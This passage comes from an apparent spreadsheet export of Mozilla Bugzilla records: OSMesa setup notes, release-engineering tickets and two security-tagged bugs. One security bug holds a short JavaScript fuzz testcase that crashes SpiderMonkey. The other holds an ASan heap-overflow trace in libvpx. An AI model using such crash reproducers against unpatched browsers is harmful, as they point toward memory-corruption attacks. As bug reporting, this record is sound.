A requirement for that is to have some sort of OpenGL (aka 3D graphics) capability, either in hardware (GPU) or in software.
OSMesa is a software (i.e. not relying on the GPU) implementation of OpenGL. It is available on all platforms that we need to support, as far as I know.
Having OSMesa is *not* a requirement to run the WebGL Mochitest. However:
 * if both native OpenGL and OSMesa is available, the Mochitest will run its sub-tests twice, with native OpenGL and with OSMesa. This results in more extensive/reliable test coverage. Hence, having OSMesa is always desirable.
 * if some of your buildslaves don't have usable OpenGL, then OSMesa is a good alternative.
*** Where to get OSMesa from ***
Windows 32 bit:
  http://people.mozilla.com/~vladimir/misc/OSMESA32.zip
Linux package names:
  Debian: libosmesa6
  Ubuntu: libosmesa6
  Fedora: mesa-libOSMesa
  openSUSE: Mesa
Other platforms: builds/links coming soon :-)
*** How to inform Firefox of where OSMesa is installed ***
This is controlled by the preference webgl.osmesalib. For example, on linux, typically all you have to do is set webgl.osmesalib=libOSMesa.so.6.
When running the Mochitest, one can pass that pref by setting this environment variable:
  EXTRA_TEST_ARGS='--setpref=webgl.osmesa=\"libOSMesa.so.6\"'</t>
        </is>
      </c>
      <c r="X6407" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6408">
      <c r="A6408" t="n">
        <v>384888</v>
      </c>
      <c r="B6408" t="inlineStr">
        <is>
          <t>2007-06-18 08:26:00 -0700</t>
        </is>
      </c>
      <c r="C6408" t="inlineStr">
        <is>
          <t>Backup Windows and Linux 1.8 tinderbox VMs</t>
        </is>
      </c>
      <c r="D6408" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6408" t="n">
        <v>1</v>
      </c>
      <c r="F6408" t="n">
        <v>1</v>
      </c>
      <c r="G6408" t="n">
        <v>5</v>
      </c>
      <c r="H6408" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6408" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6408" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6408" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6408" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6408" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6408" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6408" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6408" t="inlineStr"/>
      <c r="Q6408" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6408" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6408" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6408" t="n">
        <v>1</v>
      </c>
      <c r="U6408" t="n">
        <v>0</v>
      </c>
      <c r="V6408" t="n">
        <v>3</v>
      </c>
      <c r="W6408" t="inlineStr">
        <is>
          <t>See summary.</t>
        </is>
      </c>
      <c r="X6408" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6409">
      <c r="A6409" t="n">
        <v>1314448</v>
      </c>
      <c r="B6409" t="inlineStr">
        <is>
          <t>2016-11-01 15:09:01 -0700</t>
        </is>
      </c>
      <c r="C6409" t="inlineStr">
        <is>
          <t>Create a build target that adds --disable-webrtc to the mozconfig</t>
        </is>
      </c>
      <c r="D6409" t="inlineStr">
        <is>
          <t>2018-11-16 08:47:24 -0800</t>
        </is>
      </c>
      <c r="E6409" t="n">
        <v>1</v>
      </c>
      <c r="F6409" t="n">
        <v>1</v>
      </c>
      <c r="G6409" t="n">
        <v>5</v>
      </c>
      <c r="H6409" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6409" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6409" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6409" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6409" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6409" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6409" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6409" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6409" t="inlineStr">
        <is>
          <t>[tor][tor-testing][fingerprinting]</t>
        </is>
      </c>
      <c r="Q6409" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6409" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6409" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6409" t="n">
        <v>1</v>
      </c>
      <c r="U6409" t="n">
        <v>1</v>
      </c>
      <c r="V6409" t="n">
        <v>4</v>
      </c>
      <c r="W6409" t="inlineStr">
        <is>
          <t>To proactively detect breakage (such as #1304490) that will affect Tor Browser, we would like to add a build target (perhaps a platform?) that will add the --disable-webrtc mozconfig option and then compile and confirm the compilation occurs successfully.</t>
        </is>
      </c>
      <c r="X6409" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6410">
      <c r="A6410" t="n">
        <v>389218</v>
      </c>
      <c r="B6410" t="inlineStr">
        <is>
          <t>2007-07-22 23:21:12 -0700</t>
        </is>
      </c>
      <c r="C6410" t="inlineStr">
        <is>
          <t>Version/config bumps for Fx 2006</t>
        </is>
      </c>
      <c r="D6410" t="inlineStr">
        <is>
          <t>2018-11-26 09:45:22 -0800</t>
        </is>
      </c>
      <c r="E6410" t="n">
        <v>1</v>
      </c>
      <c r="F6410" t="n">
        <v>1</v>
      </c>
      <c r="G6410" t="n">
        <v>7</v>
      </c>
      <c r="H6410" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6410" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J6410" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6410" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L6410" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6410" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6410" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6410" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6410" t="inlineStr"/>
      <c r="Q6410" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6410" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6410" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6410" t="n">
        <v>1</v>
      </c>
      <c r="U6410" t="n">
        <v>0</v>
      </c>
      <c r="V6410" t="n">
        <v>7</v>
      </c>
      <c r="W6410" t="inlineStr">
        <is>
          <t>Tracking bug for version and config bumps for the Firefox 2.0.0.6 release.</t>
        </is>
      </c>
      <c r="X6410" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6411">
      <c r="A6411" t="n">
        <v>1261488</v>
      </c>
      <c r="B6411" t="inlineStr">
        <is>
          <t>2016-04-01 14:21:24 -0700</t>
        </is>
      </c>
      <c r="C6411" t="inlineStr">
        <is>
          <t>prototype window-stapled sidebar using different XUL browsers to display TOC + sidebar or just sidebar</t>
        </is>
      </c>
      <c r="D6411" t="inlineStr">
        <is>
          <t>2016-04-26 21:24:17 -0700</t>
        </is>
      </c>
      <c r="E6411" t="n">
        <v>1</v>
      </c>
      <c r="F6411" t="n">
        <v>1</v>
      </c>
      <c r="G6411" t="n">
        <v>6</v>
      </c>
      <c r="H6411" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6411" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J6411" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K6411" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6411" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6411" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6411" t="inlineStr">
        <is>
          <t>[akita]</t>
        </is>
      </c>
      <c r="Q6411" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6411" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6411" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6411" t="n">
        <v>1</v>
      </c>
      <c r="U6411" t="n">
        <v>0</v>
      </c>
      <c r="V6411" t="n">
        <v>22</v>
      </c>
      <c r="W6411" t="inlineStr">
        <is>
          <t>This is based on some discussions with Ed, Mark, and Ian yesterday.  This seems like a cleaner way to keep our data architecture simpler than the stuff prototyped in bug 1259269.</t>
        </is>
      </c>
      <c r="X6411" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6412">
      <c r="A6412" t="n">
        <v>1004480</v>
      </c>
      <c r="B6412" t="inlineStr">
        <is>
          <t>2014-05-01 07:36:24 -0700</t>
        </is>
      </c>
      <c r="C6412" t="inlineStr">
        <is>
          <t>Assertion failure: data.s.payload.why == why, at js/Value.h:1095 or Crash [@ argumentsVarIndex]</t>
        </is>
      </c>
      <c r="D6412" t="inlineStr">
        <is>
          <t>2015-08-07 18:42:34 -0700</t>
        </is>
      </c>
      <c r="E6412" t="n">
        <v>1</v>
      </c>
      <c r="F6412" t="n">
        <v>1</v>
      </c>
      <c r="G6412" t="n">
        <v>3</v>
      </c>
      <c r="H6412" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6412" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6412" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6412" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6412" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6412" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6412" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6412" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P6412" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main32+]</t>
        </is>
      </c>
      <c r="Q6412" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6412" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6412" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6412" t="n">
        <v>1</v>
      </c>
      <c r="U6412" t="n">
        <v>0</v>
      </c>
      <c r="V6412" t="n">
        <v>9</v>
      </c>
      <c r="W6412" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision b227a707080f (run with --fuzzing-safe):
setJitCompilerOption("ion.usecount.trigger", 30);
var PointType = TypedObject.uint16.array(3);
var VecPointType = PointType.array(3);
  for (var i = 0; i &lt; 5000; i += 10) {
    var vec = new VecPointType();
    var i0 = i % 3;
    vec[i0][new Function("ABCDEFGHIJK", "1234")];
}</t>
        </is>
      </c>
      <c r="X6412" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6413">
      <c r="A6413" t="n">
        <v>1178148</v>
      </c>
      <c r="B6413" t="inlineStr">
        <is>
          <t>2015-06-28 18:22:34 -0700</t>
        </is>
      </c>
      <c r="C6413" t="inlineStr">
        <is>
          <t>Out of bounds read in decrease_ref_count</t>
        </is>
      </c>
      <c r="D6413" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:45 -0700</t>
        </is>
      </c>
      <c r="E6413" t="n">
        <v>1</v>
      </c>
      <c r="F6413" t="n">
        <v>1</v>
      </c>
      <c r="G6413" t="n">
        <v>3</v>
      </c>
      <c r="H6413" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6413" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6413" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K6413" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6413" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6413" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6413" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6413" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6413" t="inlineStr">
        <is>
          <t>[adv-main40+]</t>
        </is>
      </c>
      <c r="Q6413" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6413" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6413" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T6413" t="n">
        <v>1</v>
      </c>
      <c r="U6413" t="n">
        <v>0</v>
      </c>
      <c r="V6413" t="n">
        <v>10</v>
      </c>
      <c r="W6413" t="inlineStr">
        <is>
          <t>Created attachment 8627068
webm.zip
&gt;=================================================================
&gt;==18435==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f00008dab0 at pc 0x7fcb35a73832 bp 0x7fcaf976e030 sp 0x7fcaf976e028
&gt;READ of size 8 at 0x61f00008dab0 thread T101 (MediaPl~back #1)
&gt;    #0 0x7fcb35a73831 in decrease_ref_count /build/firefox/src/media/libvpx/vp9/decoder/vp9_decoder.h:126
&gt;    #1 0x7fcb35c0044b in frame_worker_hook /build/firefox/src/media/libvpx/vp9/vp9_dx_iface.c:322
&gt;    #2 0x7fcb35a0ed76 in execute /build/firefox/src/media/libvpx/vp9/common/vp9_thread.c:134
&gt;    #3 0x7fcb35bffadd in decode_one /build/firefox/src/media/libvpx/vp9/vp9_dx_iface.c:493
&gt;    #4 0x7fcb35bf9507 in decoder_decode /build/firefox/src/media/libvpx/vp9/vp9_dx_iface.c:686
&gt;    #5 0x7fcb35c013c7 in vpx_codec_decode /build/firefox/src/media/libvpx/vpx/src/vpx_decoder.c:122
&gt;    #6 0x7fcb32ad4f6e in DecodeVideoFrame /build/firefox/src/dom/media/webm/SoftwareWebMVideoDecoder.cpp:149
&gt;    #7 0x7fcb3269a919 in RequestVideoData /build/firefox/src/dom/media/MediaDecoderReader.cpp:277
&gt;    #8 0x7fcb3278e93d in Invoke /build/firefox/src/objdir-ff-asan/dom/media/../../dist/include/MediaPromise.h:902
&gt;    #9 0x7fcb3278ec53 in Run /build/firefox/src/objdir-ff-asan/dom/media/../../dist/include/MediaPromise.h:919
&gt;    #10 0x7fcb32649dbc in Run /build/firefox/src/dom/media/TaskDispatcher.h:181
&gt;    #11 0x7fcb327d6489 in Run /build/firefox/src/dom/media/MediaTaskQueue.cpp:256
&gt;    #12 0x7fcb2dd6648e in Run /build/firefox/src/xpcom/threads/nsThreadPool.cpp:221
&gt;    #13 0x7fcb2dd66a6c in _ZThn8_N12nsThreadPool3RunEv /build/firefox/src/xpcom/threads/nsThreadPool.cpp:151
&gt;    #14 0x7fcb2dd60106 in ProcessNextEvent /build/firefox/src/xpcom/threads/nsThread.cpp:848
&gt;    #15 0x7fcb2ddd70fc in NS_ProcessNextEvent /build/firefox/src/xpcom/glue/nsThreadUtils.cpp:265
&gt;    #16 0x7fcb2e687ed6 in Run /build/firefox/src/ipc/glue/MessagePump.cpp:326
&gt;    #17 0x7fcb2e611c61 in RunInternal /build/firefox/src/ipc/chromium/src/base/message_loop.cc:234
&gt;    #18 0x7fcb2dd5cba1 in ThreadFunc /build/firefox/src/xpcom/threads/nsThread.cpp:360
&gt;    #19 0x7fcb3b5c5ffa in _pt_root /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:212
&gt;    #20 0x7fcb3bc0a181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312 (discriminator 2)
&gt;    #21 0x7fcb2b24047c in clone /build/buildd/eglibc-2.19/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:111
&gt;
&gt;0x61f00008dab0 is located 17 bytes to the right of 3103-byte region [0x61f00008ce80,0x61f00008da9f)
&gt;allocated by thread T102 (MediaPl~back #2) here:
&gt;    #0 0x4b6338 in __interceptor_malloc _asan_rtl_ (discriminator 14)
&gt;    #1 0x7fcb35c03256 in vpx_memalign /build/firefox/src/media/libvpx/vpx_mem/vpx_mem.c:126
&gt;    #2 0x7fcb35bf853a in init_decoder /build/firefox/src/media/libvpx/vp9/vp9_dx_iface.c:372
&gt;    #3 0x7fcb35c013c7 in vpx_codec_decode /build/firefox/src/media/libvpx/vpx/src/vpx_decoder.c:122
&gt;    #4 0x7fcb32ad4f6e in DecodeVideoFrame /build/firefox/src/dom/media/webm/SoftwareWebMVideoDecoder.cpp:149
&gt;    #5 0x7fcb3269a919 in RequestVideoData /build/firefox/src/dom/media/MediaDecoderReader.cpp:277
&gt;    #6 0x7fcb3278e93d in Invoke /build/firefox/src/objdir-ff-asan/dom/media/../../dist/include/MediaPromise.h:902
&gt;    #7 0x7fcb3278ec53 in Run /build/firefox/src/objdir-ff-asan/dom/media/../../dist/include/MediaPromise.h:919
&gt;    #8 0x7fcb32649dbc in Run /build/firefox/src/dom/media/TaskDispatcher.h:181
&gt;    #9 0x7fcb327d6489 in Run /build/firefox/src/dom/media/MediaTaskQueue.cpp:256
&gt;    #10 0x7fcb2dd6648e in Run /build/firefox/src/xpcom/threads/nsThreadPool.cpp:221
&gt;    #11 0x7fcb2dd66a6c in _ZThn8_N12nsThreadPool3RunEv /build/firefox/src/xpcom/threads/nsThreadPool.cpp:151
&gt;    #12 0x7fcb2dd60106 in ProcessNextEvent /build/firefox/src/xpcom/threads/nsThread.cpp:848
&gt;    #13 0x7fcb2ddd70fc in NS_ProcessNextEvent /build/firefox/src/xpcom/glue/nsThreadUtils.cpp:265
&gt;    #14 0x7fcb2e687ed6 in Run /build/firefox/src/ipc/glue/MessagePump.cpp:326
&gt;    #15 0x7fcb2e611c61 in RunInternal /build/firefox/src/ipc/chromium/src/base/message_loop.cc:234
&gt;    #16 0x7fcb2dd5cba1 in ThreadFunc /build/firefox/src/xpcom/threads/nsThread.cpp:360
&gt;    #17 0x7fcb3b5c5ffa in _pt_root /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:212
&gt;    #18 0x7fcb3bc0a181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312 (discriminator 2)
&gt;
&gt;Thread T101 (MediaPl~back #1) created by T0 (Web Content) here:
&gt;    #0 0x430269 in __interceptor_pthread_create _asan_rtl_ (discriminator 7)
&gt;    #1 0x7fcb3b5c2dbf in _PR_CreateThread /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:453
&gt;    #2 0x7fcb3b5c29ea in PR_CreateThread /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:544
&gt;    #3 0x7fcb2dd5df66 in Init /build/firefox/src/xpcom/threads/nsThread.cpp:470
&gt;    #4 0x7fcb2dd63c6f in NewThread /build/firefox/src/xpcom/threads/nsThreadManager.cpp:253
&gt;    #5 0x7fcb2dd653dd in PutEvent /build/firefox/src/xpcom/threads/nsThreadPool.cpp:102
&gt;    #6 0x7fcb2dd66eda in Dispatch /build/firefox/src/xpcom/threads/nsThreadPool.cpp:262
&gt;    #7 0x7fcb327d4c9e in DispatchLocked /build/firefox/src/dom/media/MediaTaskQueue.cpp:65
&gt;    #8 0x7fcb327383cf in Dispatch /build/firefox/src/objdir-ff-asan/dom/media/fmp4/../../../dist/include/MediaTaskQueue.h:52
&gt;    #9 0x7fcb32648958 in DispatchTaskGroup /build/firefox/src/dom/media/TaskDispatcher.h:233
&gt;    #10 0x7fcb32648567 in reset /build/firefox/src/objdir-ff-asan/dom/media/../../dist/include/mozilla/Maybe.h:373
&gt;    #11 0x7fcb3264abb0 in apply&lt;mozilla::XPCOMThreadWrapper, void (mozilla::XPCOMThreadWrapper::*)()&gt; /build/firefox/src/objdir-ff-asan/dom/media/../../dist/include/nsThreadUtils.h:618 (discriminator 4)
&gt;    #12 0x7fcb337195e1 in RunSyncSectionsInternal /build/firefox/src/widget/nsBaseAppShell.cpp:376
&gt;    #13 0x7fcb3371a8be in AfterProcessNextEvent /build/firefox/src/widget/nsBaseAppShell.h:95
&gt;    #14 0x7fcb2dd60563 in ProcessNextEvent /build/firefox/src/xpcom/threads/nsThread.cpp:862
&gt;    #15 0x7fcb2ddd70fc in NS_ProcessNextEvent /build/firefox/src/xpcom/glue/nsThreadUtils.cpp:265
&gt;    #16 0x7fcb2e6870fe in Run /build/firefox/src/ipc/glue/MessagePump.cpp:95
&gt;    #17 0x7fcb2e611c61 in RunInternal /build/firefox/src/ipc/chromium/src/base/message_loop.cc:234
&gt;    #18 0x7fcb33717e6f in _ZN14nsBaseAppShell3RunEv /build/firefox/src/widget/nsBaseAppShell.cpp:165
&gt;    #19 0x7fcb356592c3 in XRE_RunAppShell /build/firefox/src/toolkit/xre/nsEmbedFunctions.cpp:778
&gt;    #20 0x7fcb2e611c61 in RunInternal /build/firefox/src/ipc/chromium/src/base/message_loop.cc:234
&gt;    #21 0x7fcb356587e7 in XRE_InitChildProcess /build/firefox/src/toolkit/xre/nsEmbedFunctions.cpp:614
&gt;    #22 0x4dbbf2 in content_process_main /build/firefox/src/ipc/app/../contentproc/plugin-container.cpp:236
&gt;    #23 0x7fcb2b167ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
&gt;
&gt;Thread T102 (MediaPl~back #2) created by T0 (Web Content) here:
&gt;    #0 0x430269 in __interceptor_pthread_create _asan_rtl_ (discriminator 7)
&gt;    #1 0x7fcb3b5c2dbf in _PR_CreateThread /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:453
&gt;    #2 0x7fcb3b5c29ea in PR_CreateThread /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:544
&gt;    #3 0x7fcb2dd5df66 in Init /build/firefox/src/xpcom/threads/nsThread.cpp:470
&gt;    #4 0x7fcb2dd63c6f in NewThread /build/firefox/src/xpcom/threads/nsThreadManager.cpp:253
&gt;    #5 0x7fcb2dd653dd in PutEvent /build/firefox/src/xpcom/threads/nsThreadPool.cpp:102
&gt;    #6 0x7fcb2dd66eda in Dispatch /build/firefox/src/xpcom/threads/nsThreadPool.cpp:262
&gt;    #7 0x7fcb327d4c9e in DispatchLocked /build/firefox/src/dom/media/MediaTaskQueue.cpp:65
&gt;    #8 0x7fcb327383cf in Dispatch /build/firefox/src/objdir-ff-asan/dom/media/fmp4/../../../dist/include/MediaTaskQueue.h:52
&gt;    #9 0x7fcb32648958 in DispatchTaskGroup /build/firefox/src/dom/media/TaskDispatcher.h:233
&gt;    #10 0x7fcb32648567 in reset /build/firefox/src/objdir-ff-asan/dom/media/../../dist/include/mozilla/Maybe.h:373
&gt;    #11 0x7fcb3264abb0 in apply&lt;mozilla::XPCOMThreadWrapper, void (mozilla::XPCOMThreadWrapper::*)()&gt; /build/firefox/src/objdir-ff-asan/dom/media/../../dist/include/nsThreadUtils.h:618 (discriminator 4)
&gt;    #12 0x7fcb337195e1 in RunSyncSectionsInternal /build/firefox/src/widget/nsBaseAppShell.cpp:376
&gt;    #13 0x7fcb3371a8be in AfterProcessNextEvent /build/firefox/src/widget/nsBaseAppShell.h:95
&gt;    #14 0x7fcb2dd60563 in ProcessNextEvent /build/firefox/src/xpcom/threads/nsThread.cpp:862
&gt;    #15 0x7fcb2ddd70fc in NS_ProcessNextEvent /build/firefox/src/xpcom/glue/nsThreadUtils.cpp:265
&gt;    #16 0x7fcb2e6870fe in Run /build/firefox/src/ipc/glue/MessagePump.cpp:95
&gt;    #17 0x7fcb2e611c61 in RunInternal /build/firefox/src/ipc/chromium/src/base/message_loop.cc:234
&gt;    #18 0x7fcb33717e6f in _ZN14nsBaseAppShell3RunEv /build/firefox/src/widget/nsBaseAppShell.cpp:165
&gt;    #19 0x7fcb356592c3 in XRE_RunAppShell /build/firefox/src/toolkit/xre/nsEmbedFunctions.cpp:778
&gt;    #20 0x7fcb2e611c61 in RunInternal /build/firefox/src/ipc/chromium/src/base/message_loop.cc:234
&gt;    #21 0x7fcb356587e7 in XRE_InitChildProcess /build/firefox/src/toolkit/xre/nsEmbedFunctions.cpp:614
&gt;    #22 0x4dbbf2 in content_process_main /build/firefox/src/ipc/app/../contentproc/plugin-container.cpp:236
&gt;    #23 0x7fcb2b167ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
&gt;
&gt;Shadow bytes around the buggy address:
&gt;  0x0c3e80009b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0c3e80009b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0c3e80009b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0c3e80009b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0c3e80009b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;=&gt;0x0c3e80009b50: 00 00 00 07 fa fa[fa]fa fa fa fa fa fa fa fa fa
&gt;  0x0c3e80009b60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c3e80009b70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c3e80009b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c3e80009b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c3e80009ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:       fa
&gt;  Heap right redzone:      fb
&gt;  Freed heap region:       fd
&gt;  Stack left redzone:      f1
&gt;  Stack mid redzone:       f2
&gt;  Stack right redzone:     f3
&gt;  Stack partial redzone:   f4
&gt;  Stack after return:      f5
&gt;  Stack use after scope:   f8
&gt;  Global redzone:          f9
&gt;  Global init order:       f6
&gt;  Poisoned by user:        f7
&gt;  Container overflow:      fc
&gt;  Array cookie:            ac
&gt;  Intra object redzone:    bb
&gt;  ASan internal:           fe
&gt;  Left alloca redzone:     ca
&gt;  Right alloca redzone:    cb
&gt;==18435==ABORTING</t>
        </is>
      </c>
      <c r="X6413" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6414">
      <c r="A6414" t="n">
        <v>639142</v>
      </c>
      <c r="B6414" t="inlineStr">
        <is>
          <t>2011-03-05 05:05:52 -0800</t>
        </is>
      </c>
      <c r="C6414" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Thunderbird 3.1.9 to bouncer</t>
        </is>
      </c>
      <c r="D6414" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6414" t="n">
        <v>1</v>
      </c>
      <c r="F6414" t="n">
        <v>1</v>
      </c>
      <c r="G6414" t="n">
        <v>5</v>
      </c>
      <c r="H6414" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6414" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6414" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6414" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6414" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6414" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N6414" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6414" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6414" t="inlineStr"/>
      <c r="Q6414" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6414" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6414" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6414" t="n">
        <v>1</v>
      </c>
      <c r="U6414" t="n">
        <v>0</v>
      </c>
      <c r="V6414" t="n">
        <v>1</v>
      </c>
      <c r="W6414" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #637999 ++
solaris-sparc:
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.9.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.9.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.9.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.9.en-US.opensolaris-i386.tar.bz2
The partial MAR for (3.1.8 to 3.1.9):
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.8-3.1.9.en-US.solaris-10-fcs-sparc.partial.mar
